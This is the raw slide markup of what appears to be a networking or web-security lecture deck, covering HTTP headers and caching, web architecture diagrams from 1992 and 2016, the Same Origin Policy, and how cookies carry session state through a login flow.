              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>If-Modified-Since: Mon, 29 Jan 2001 	17:54:18 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>If-None-Match: "7a11f-10ed-3a75ae4a"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>User-Agent: Mozilla/4.0 (compatible)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Host: www.intel-iris.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Connection: Keep-Alive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6172200" y="1343458"/>
            <a:ext cx="5578150" cy="823912"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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Response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6172199" y="2178626"/>
            <a:ext cx="5578151" cy="4574021"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-3429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HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40404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304 Not Modified</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040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342900" lvl="0" indent="-3429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Date: Tue, 27 Mar 2001 03:50:51 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-3429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Server: Apache/1.3.14 (Unix) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-3429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Connection: Keep-Alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-3429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Keep-Alive: timeout=15, max=100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-3429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2400" dirty="0" err="1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ETag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0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: "7a11f-10ed-3a75ae4a”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121637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  <p:bldP spid="10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19">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client-Server Computing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422"/>
              </a:spcBef>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2672" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>99% of all distributed systems use client-server architectures!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="352"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="2391" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="422"/>
              </a:spcBef>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2672" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Today: look at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2672" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>most popular </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2672" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client-server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2672" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– The Web</a:t>
            </a:r>
            <a:endParaRPr sz="2672" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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xfrm>
            <a:off x="1689600" y="1076027"/>
            <a:ext cx="213510" cy="33933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fontScale="85000" lnSpcReduction="10000"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fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr sz="2109" b="1">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr sz="2109" b="1">
              <a:solidFill>
                <a:srgbClr val="FEFE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293844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on Today’s Internet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flows are HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web is at least 52% of traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Median object size is 2.7K, average is 85K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP uses TCP, so it will</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be ACK clocked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For Web, likely never leave slow start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general, not have great performance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alternatives?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 2.0 – aggressively pipelines and multiplexes connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>QUIC – Google’s alternative to TCP designed just for HTTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167812647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Same Origin Policy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Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>XHR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151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11785600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Architecture circa-1992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028" y="2282189"/>
            <a:ext cx="893446" cy="8934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0049" y="1514143"/>
            <a:ext cx="5527191" cy="461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Client Side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869" y="2282189"/>
            <a:ext cx="971550" cy="971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38210" y="1514935"/>
            <a:ext cx="3356610" cy="4608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Server Side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37338" y="1514143"/>
            <a:ext cx="2390775" cy="46166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Protocols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92165" y="3844760"/>
            <a:ext cx="12811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Gopher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP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91464" y="3514396"/>
            <a:ext cx="1411605" cy="2011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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Renderer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64245" y="3514396"/>
            <a:ext cx="1805940" cy="520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HTML Parser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028" y="3998262"/>
            <a:ext cx="1043939" cy="104393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 rot="5400000">
            <a:off x="4849637" y="4329174"/>
            <a:ext cx="2264913" cy="382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Network Protocols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7405753" y="4329174"/>
            <a:ext cx="2264913" cy="382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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4370185" y="3774593"/>
            <a:ext cx="1420850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55275" y="3387776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HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1703069" y="3774592"/>
            <a:ext cx="861176" cy="745643"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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729268" y="4537258"/>
            <a:ext cx="1120841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214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Elbow Connector 54"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="1"/>
            <a:endCxn id="50" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1498923" y="4583541"/>
            <a:ext cx="1258155" cy="1549783"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37639"/>
            </a:avLst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11" idx="1"/>
            <a:endCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="2564245" y="3774593"/>
            <a:ext cx="902970" cy="1357702"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26005"/>
              <a:gd name="adj2" fmla="val 83864"/>
            </a:avLst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11785600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Architecture circa-2016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028" y="2282189"/>
            <a:ext cx="893446" cy="8934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0049" y="1514143"/>
            <a:ext cx="5527191" cy="461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Client Side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38210" y="1514935"/>
            <a:ext cx="3356610" cy="4608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Server Side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37338" y="1514143"/>
            <a:ext cx="2390775" cy="46166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Protocols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37338" y="3185204"/>
            <a:ext cx="23907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FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP 1.0/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SSL and TLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Websocket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>QUIC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91464" y="3514396"/>
            <a:ext cx="1411605" cy="2011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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Model and Renderer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64245" y="3514396"/>
            <a:ext cx="1805940" cy="520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HTML Parser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598" y="5140867"/>
            <a:ext cx="1043939" cy="104393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 rot="5400000">
            <a:off x="4849637" y="4329174"/>
            <a:ext cx="2264913" cy="382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Network Protocols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7405753" y="4329174"/>
            <a:ext cx="2264913" cy="382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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4370185" y="3774593"/>
            <a:ext cx="1420850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55275" y="3387776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HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1723965" y="3774593"/>
            <a:ext cx="840280" cy="548752"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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564245" y="5132295"/>
            <a:ext cx="1805940" cy="520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CSS Parser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757077" y="4323345"/>
            <a:ext cx="1420850" cy="520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JS Runtime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4177927" y="4570688"/>
            <a:ext cx="1613108" cy="8937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929859" y="4201356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JS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4370185" y="5420470"/>
            <a:ext cx="1420850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52915" y="5042201"/>
            <a:ext cx="524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CSS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678706" y="4034790"/>
            <a:ext cx="287" cy="288555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20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1703069" y="4889242"/>
            <a:ext cx="861177" cy="503251"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst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1" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1704396" y="4583542"/>
            <a:ext cx="1052681" cy="899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lowchart: Magnetic Disk 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495609" y="5691676"/>
            <a:ext cx="1003313" cy="88329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Storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="Elbow Connector 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3384433" y="3767179"/>
            <a:ext cx="712150" cy="4483171"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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238370" y="5988417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Cookies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030" y="2122475"/>
            <a:ext cx="1005227" cy="1005227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9194338" y="3405920"/>
            <a:ext cx="1561147" cy="17870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Application Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Java, PHP, Python, Node, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Flowchart: Magnetic Disk 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10903267" y="2914914"/>
            <a:ext cx="1149708" cy="94572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Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68" name="Straight Arrow Connector 67"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="66" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729268" y="4299451"/>
            <a:ext cx="465070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>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729268" y="5420470"/>
            <a:ext cx="2267330" cy="242367"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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>
            <a:stCxn id="66" idx="3"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10755485" y="4299451"/>
            <a:ext cx="763083" cy="841416"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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>
            <a:cxnSpLocks/>
            <a:stCxn id="66" idx="3"/>
            <a:endCxn id="67" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10755485" y="3860638"/>
            <a:ext cx="722636" cy="438813"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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3271892" y="4029971"/>
            <a:ext cx="5556" cy="287642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3771549" y="4843739"/>
            <a:ext cx="287" cy="288555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98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Securing the Browser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Browsers have become incredibly complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ability to open multiple pages at the same time (tabs and windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute arbitrary code (JavaScript)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store state from many origins (cookies, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does the browser isolate code/data from different pages?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One page shouldn’t be able to interfere with any others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One page shouldn’t be able to read private data stored by any others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional challenge: content may mix origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web pages may embed images and scripts from other domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Same Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basis for all classical web security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56275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F1A03-121F-4B05-8112-A19D3893F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Cookies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99D47-E669-469C-B7DE-454A7A043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Introduced in 1994, cookies are a basic mechanism for persistent state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows services to store a small amount of data at the client (usually ~4K)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often used for identification, authentication, user tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain and path restricts resources browser will send cookies to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expiration sets how long cookie is valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional security restrictions (added much later): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manipulated by Set-Cookie and Cookie headers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003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11785600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie Example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170" y="2275749"/>
            <a:ext cx="893446" cy="8934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0050" y="1514143"/>
            <a:ext cx="3249370" cy="461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Client Side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64" y="2236697"/>
            <a:ext cx="971550" cy="971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24967" y="1514935"/>
            <a:ext cx="3769853" cy="4608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Server Side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919579" y="2016821"/>
            <a:ext cx="3859415" cy="378074"/>
            <a:chOff x="4401624" y="3387776"/>
            <a:chExt cx="3859415" cy="378074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4401624" y="3748365"/>
              <a:ext cx="3859415" cy="17485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781724" y="3387776"/>
              <a:ext cx="3200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GET /login_form.html HTTP/1.1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919579" y="2503294"/>
            <a:ext cx="3859415" cy="386817"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4370185" y="3774593"/>
              <a:ext cx="3859415" cy="0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477844" y="3387776"/>
              <a:ext cx="1808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HTTP/1.1 200 OK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919579" y="3176572"/>
            <a:ext cx="3859415" cy="378074"/>
            <a:chOff x="4401624" y="3387776"/>
            <a:chExt cx="3859415" cy="378074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4401624" y="3748365"/>
              <a:ext cx="3859415" cy="17485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945584" y="3387776"/>
              <a:ext cx="28727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POST /cgi/login.sh HTTP/1.1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919579" y="3700096"/>
            <a:ext cx="3859415" cy="709300"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Straight Arrow Connector 29"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4370185" y="3774593"/>
              <a:ext cx="3859415" cy="0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4536569" y="3387776"/>
              <a:ext cx="3690754" cy="3524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HTTP/1.1 302 Found</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Set-Cookie: session=FhizeVYSkS7X2K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919579" y="6020986"/>
            <a:ext cx="3857139" cy="646332"/>
            <a:chOff x="4401624" y="3469443"/>
            <a:chExt cx="3857139" cy="279226"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4401624" y="3748365"/>
              <a:ext cx="3857139" cy="304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4610783" y="3469443"/>
              <a:ext cx="3542316" cy="279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GET /my_files.html HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Cookie: session=FhizeVYSkS7X2K;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35B6BEB-5BD0-4093-9839-1A61DEF05D66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3919579" y="5433289"/>
            <a:ext cx="3859415" cy="386817"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="386817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9A88B3F5-9C3B-4540-B8FB-291C98C62367}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4370185" y="3774593"/>
              <a:ext cx="3859415" cy="0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5959F42-1FB7-4A4D-AEF8-4A1725C686E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5477844" y="3387776"/>
              <a:ext cx="1808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HTTP/1.1 200 OK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5CCDCED-EEA0-4ADB-AC1E-FF2F7AEF3810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3919579" y="4645868"/>
            <a:ext cx="3857139" cy="646332"/>
            <a:chOff x="4401624" y="3469443"/>
            <a:chExt cx="3857139" cy="279226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4AE87FB-6664-4C64-A51D-4F9556C8781F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4401624" y="3748365"/>
              <a:ext cx="3857139" cy="304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AACB08A-ACFB-42C6-BDD5-18B11EA6645B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4691254" y="3469443"/>
              <a:ext cx="3381374" cy="279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GET /private_data.html HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Cookie: session=FhizeVYSkS7X2K;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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1A445283-2838-4C8B-84DB-4B10E7EF8C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310185" y="3700096"/>
            <a:ext cx="1846997" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 91482"/>
              <a:gd name="adj2" fmla="val 244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Store the cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Speech Bubble: Rectangle 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{963B6A5F-309B-4C86-BB14-671F240FCCBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8609619" y="3361238"/>
            <a:ext cx="3236638" cy="1333588"/>
